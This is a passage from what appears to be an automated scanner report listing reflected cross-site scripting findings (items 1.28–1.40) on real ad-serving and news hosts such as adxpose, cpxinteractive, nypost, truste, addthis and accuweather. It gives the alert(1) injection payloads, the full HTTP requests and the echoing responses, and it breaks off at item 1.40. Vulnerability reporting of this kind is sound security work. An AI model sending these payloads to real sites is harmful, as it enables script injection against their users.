This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536&cid=EI9-DR-Interclick86d9f<img%20src%3da%20onerror%3dalert(1)>fcea5a88802&vchannel=9075&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D1 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4CBBAE03D814E81407E7BA4F085CD829; Path=/
Content-Type: text/javascript;charset=UTF-8
Content-Length: 730
Date: Tue, 08 Feb 2011 02:46:35 GMT
Connection: close

__ADXPOSE_PREFS__ = {"uid":"M6uzDYEbWGBrvdnp_69536","altbannerurl":"http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D51%26b%3D9075%26cid%3D7645468%26isif%3Df%26rurld%3Dwww.nypost.com%26sl%3Dtrue%26dvp%3Dhttp%253A%2F%2Fwww.nypost.com%2F%26rurl%3Dhttp%253A%252F%252Fwww.nypost.com%252F%26blkAdxp%3D1","override":true,"vchannel":"9075","cid":"EI9-DR-Interclick86d9f<img src=a onerror=alert(1)>fcea5a88802","version":2};
document.write('<scr'+'ipt src="http://ads.adxpose.com/ads/ads.js?uid='+encodeURIComponent('M6uzDYEbWGBrvdnp_69536')+'" type="text/javascript" charset="utf-8">
...[SNIP]...

1.28. http://ads.adxpose.com/ads/tag.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/tag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf953<img%20src%3da%20onerror%3dalert(1)>4539cb68142 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf953<img src=a onerror=alert(1)>4539cb68142 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536&cid=EI9-DR-Interclick&vchannel=9075&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D1&bf953<img%20src%3da%20onerror%3dalert(1)>4539cb68142=1 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B8EF74BD1318423C8700FF923C3BB0EA; Path=/
Content-Type: text/javascript;charset=UTF-8
Content-Length: 737
Date: Tue, 08 Feb 2011 02:46:51 GMT
Connection: close

__ADXPOSE_PREFS__ = {"uid":"M6uzDYEbWGBrvdnp_69536","bf953<img src=a onerror=alert(1)>4539cb68142":"1","altbannerurl":"http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D51%26b%3D9075%26cid%3D7645468%26isif%3Df%26rurld%3Dwww.nypost.com%26sl%3Dtrue%26dvp%3Dhttp%253A%2F%2Fwww.nypost.com%2F%26rurl
...[SNIP]...

1.29. http://ads.adxpose.com/ads/tag.js [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/tag.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 455dd<script>alert(1)</script>4c15da0ec1a was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536455dd<script>alert(1)</script>4c15da0ec1a&cid=EI9-DR-Interclick&vchannel=9075&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D1 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=02E5D788C0C23C97F04D936CD6926031; Path=/
Content-Type: text/javascript;charset=UTF-8
Content-Length: 769
Date: Tue, 08 Feb 2011 02:46:32 GMT
Connection: close

__ADXPOSE_PREFS__ = {"uid":"M6uzDYEbWGBrvdnp_69536455dd<script>alert(1)<\/script>4c15da0ec1a","altbannerurl":"http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D51%26b%3D9075%26cid%3D7645468%26isif
...[SNIP]...
<scr'+'ipt src="http://ads.adxpose.com/ads/ads.js?uid='+encodeURIComponent('M6uzDYEbWGBrvdnp_69536455dd<script>alert(1)</script>4c15da0ec1a')+'" type="text/javascript" charset="utf-8">
...[SNIP]...

1.30. http://ads.adxpose.com/ads/tag.js [vchannel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/tag.js

Issue detail

The value of the vchannel request parameter is copied into the HTML document as plain text between tags. The payload 8ba3f<img%20src%3da%20onerror%3dalert(1)>f9aed8b297a was submitted in the vchannel parameter. This input was echoed as 8ba3f<img src=a onerror=alert(1)>f9aed8b297a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536&cid=EI9-DR-Interclick&vchannel=90758ba3f<img%20src%3da%20onerror%3dalert(1)>f9aed8b297a&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D1 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CA4064B619F49C566DD055974ABE8B44; Path=/
Content-Type: text/javascript;charset=UTF-8
Content-Length: 730
Date: Tue, 08 Feb 2011 02:46:40 GMT
Connection: close

__ADXPOSE_PREFS__ = {"uid":"M6uzDYEbWGBrvdnp_69536","altbannerurl":"http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D51%26b%3D9075%26cid%3D7645468%26isif%3Df%26rurld%3Dwww.nypost.com%26sl%3Dtrue%26dvp%3Dhttp%253A%2F%2Fwww.nypost.com%2F%26rurl%3Dhttp%253A%252F%252Fwww.nypost.com%252F%26blkAdxp%3D1","override":true,"vchannel":"90758ba3f<img src=a onerror=alert(1)>f9aed8b297a","cid":"EI9-DR-Interclick","version":2};
document.write('<scr'+'ipt src="http://ads.adxpose.com/ads/ads.js?uid='+encodeURIComponent('M6uzDYEbWGBrvdnp_69536')+'" type="text/javascript" charset="utf-8">
...[SNIP]...

1.31. http://adserving.cpxinteractive.com/rw [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /rw

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5e97"><script>alert(1)</script>2d71d7d1b5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=New%20offer%21&qs=iframe3%3FHQ1WAIctGAB7518AAAAAAJOJGQAAAAAAAgAAAAAAAAAAAP8AAAACFcGkJQAAAAAA3xYiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTzg8AAAAAAAICAgAAAAAAGy%2EdJAYBFkAbL90kBgEWQAAAAAAAAAAAAABQJchyE0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAChh0yu9YmZCbUZtY8cd%2EzdKjprf%2DlHY8uMhpLJAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enypost%2Ecom%252F%2CZ%253D0x0%2526y%253D29%2526s%253D1584519%2526%5Fsalt%253D4021573200%2526B%253D10%2526r%253D1%2C3a45ebde%2D3328%2D11e0%2Daebf%2D003048d6d892&b5e97"><script>alert(1)</script>2d71d7d1b5e=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:07:53 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 814
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title>New offer!</title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0"
...[SNIP]...
AAAAAAAAAAAAAAAAChh0yu9YmZCbUZtY8cd.zdKjprf-lHY8uMhpLJAAAAAA==,,http%3A%2F%2Fwww.nypost.com%2F,Z%3D0x0%26y%3D29%26s%3D1584519%26_salt%3D4021573200%26B%3D10%26r%3D1,3a45ebde-3328-11e0-aebf-003048d6d892&b5e97"><script>alert(1)</script>2d71d7d1b5e=1">
...[SNIP]...

1.32. http://adserving.cpxinteractive.com/rw [qs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /rw

Issue detail

The value of the qs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb83e"><script>alert(1)</script>1c12119eb3f was submitted in the qs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=New%20offer%21&qs=cb83e"><script>alert(1)</script>1c12119eb3f HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:07:53 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 353
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title>New offer!</title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" height="100%" width="100%" src="http://adserving.cpxinteractive.com/cb83e"><script>alert(1)</script>1c12119eb3f">
...[SNIP]...

1.33. http://adserving.cpxinteractive.com/rw [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /rw

Issue detail

The value of the title request parameter is copied into the HTML document as text between TITLE tags. The payload b58ee</title><script>alert(1)</script>a694e07824a was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=New%20offer%21b58ee</title><script>alert(1)</script>a694e07824a&qs=iframe3%3FHQ1WAIctGAB7518AAAAAAJOJGQAAAAAAAgAAAAAAAAAAAP8AAAACFcGkJQAAAAAA3xYiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTzg8AAAAAAAICAgAAAAAAGy%2EdJAYBFkAbL90kBgEWQAAAAAAAAAAAAABQJchyE0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAChh0yu9YmZCbUZtY8cd%2EzdKjprf%2DlHY8uMhpLJAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enypost%2Ecom%252F%2CZ%253D0x0%2526y%253D29%2526s%253D1584519%2526%5Fsalt%253D4021573200%2526B%253D10%2526r%253D1%2C3a45ebde%2D3328%2D11e0%2Daebf%2D003048d6d892 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:07:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 817
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title>New offer!b58ee</title><script>alert(1)</script>a694e07824a</title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true
...[SNIP]...

1.34. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3931"-alert(1)-"9217cc6e65a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1584519&banned_pop_types=29&pop_times=1&pop_frequency=86400&f3931"-alert(1)-"9217cc6e65a=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:08:13 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 08 Feb 2011 02:08:13 GMT
Pragma: no-cache
Content-Length: 4401
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 86400; rm_pop_times = 1; rm_pop_id = 1584519; rm_tag_type = "pop"; rm_url = "http://adserving.cpxinteractive.com/imp?Z=0x0&y=29&f3931"-alert(1)-"9217cc6e65a=1&s=1584519&_salt=1433585166";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

1.35. http://breakingnews.nypost.com/dynamic/external/ibd.morningstar.com/AP/StockMover.html [CN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://breakingnews.nypost.com
Path:   /dynamic/external/ibd.morningstar.com/AP/StockMover.html

Issue detail

The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c74dd'><script>alert(1)</script>bdde2c185d was submitted in the CN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707c74dd'><script>alert(1)</script>bdde2c185d&SITE=NYNYP&SECTION=DJSP_COMPLETE&TEMPLATE=DEFAULT HTTP/1.1
Host: breakingnews.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=NYNYP; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Tue, 08 Feb 2011 02:26:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:26:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Busi
...[SNIP]...
<a href='http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707C74DD'><SCRIPT>ALERT(1)</SCRIPT>BDDE2C185D.html?CN=AP707C74DD'>
...[SNIP]...

1.36. http://breakingnews.nypost.com/dynamic/external/ibd.morningstar.com/AP/StockMover.html [CN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://breakingnews.nypost.com
Path:   /dynamic/external/ibd.morningstar.com/AP/StockMover.html

Issue detail

The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccd26"><script>alert(1)</script>c57e8e6769d was submitted in the CN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707ccd26"><script>alert(1)</script>c57e8e6769d&SITE=NYNYP&SECTION=DJSP_COMPLETE&TEMPLATE=DEFAULT HTTP/1.1
Host: breakingnews.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=NYNYP; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Tue, 08 Feb 2011 02:26:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:26:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Busi
...[SNIP]...
<form name="FormAPTop" method=get action="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707CCD26"><SCRIPT>ALERT(1)</SCRIPT>C57E8E6769D.html" style="margin:0px;">
...[SNIP]...

1.37. http://clicktoverify.truste.com/pvr.php [sealid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The value of the sealid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f5846%20style%3dx%3aexpression(alert(1))%20a449f0c11e7 was submitted in the sealid parameter. This input was echoed as f5846 style=x:expression(alert(1)) a449f0c11e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /pvr.php?page=validate&url=www.adbrite.com&sealid=102f5846%20style%3dx%3aexpression(alert(1))%20a449f0c11e7 HTTP/1.1
Host: clicktoverify.truste.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:46:34 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8525


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certification by TRUSTe</title>
<meta nam
...[SNIP]...
<input
           type='hidden' name='sealid' value=102f5846 style=x:expression(alert(1)) a449f0c11e7>
...[SNIP]...

1.38. http://ds.addthis.com/red/psi/sites/www.starbucks.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.starbucks.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d6dd7<script>alert(1)</script>287b33a9360 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.starbucks.com/p.json?callback=_ate.ad.hprd6dd7<script>alert(1)</script>287b33a9360&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.starbucks.com%2Fsmooth&ref=http%3A%2F%2Fwww.nypost.com%2F&1c4bn7 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297025629.60|1296659685.66; dt=X; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 281
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 08 Feb 2011 03:03:10 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 10 Mar 2011 03:03:10 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297134190.60|1296659685.66; Domain=.addthis.com; Expires=Tue, 05-Feb-2013 18:47:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 08 Feb 2011 03:03:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 08 Feb 2011 03:03:10 GMT
Connection: close

_ate.ad.hprd6dd7<script>alert(1)</script>287b33a9360({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.starbucks.com%2fsmooth"],"segments" : ["60"],"loc": "MjAwMDFOQVVTREM
...[SNIP]...

1.39. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 82337<script>alert(1)</script>43f7dbcf295 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.nypost.com%2F&uid=M6uzDYEbWGBrvdnp_6953682337<script>alert(1)</script>43f7dbcf295&xy=697%2C2049&wh=1050%2C1040&vchannel=9075&cid=EI9-DR-Interclick&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.1&altbannerurl=http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D51%26b%3D9075%26cid%3D7645468%26isif%3Df%26rurld%3Dwww.nypost.com%26sl%3Dtrue%26dvp%3Dhttp%253A%2F%2Fwww.nypost.com%2F%26rurl%3Dhttp%253A%252F%252Fwww.nypost.com%252F%26blkAdxp%3D1&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B21BCBC2763287B5824AD144E6A526AB; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 144
Date: Tue, 08 Feb 2011 02:46:43 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("M6uzDYEbWGBrvdnp_6953682337<script>alert(1)</script>43f7dbcf295");

1.40. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f38a"%3balert(1)//3a4adeadc39 was submitted in the lang parameter. This input was echoed as 8f38a";alert(1)//3a4adeadc39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

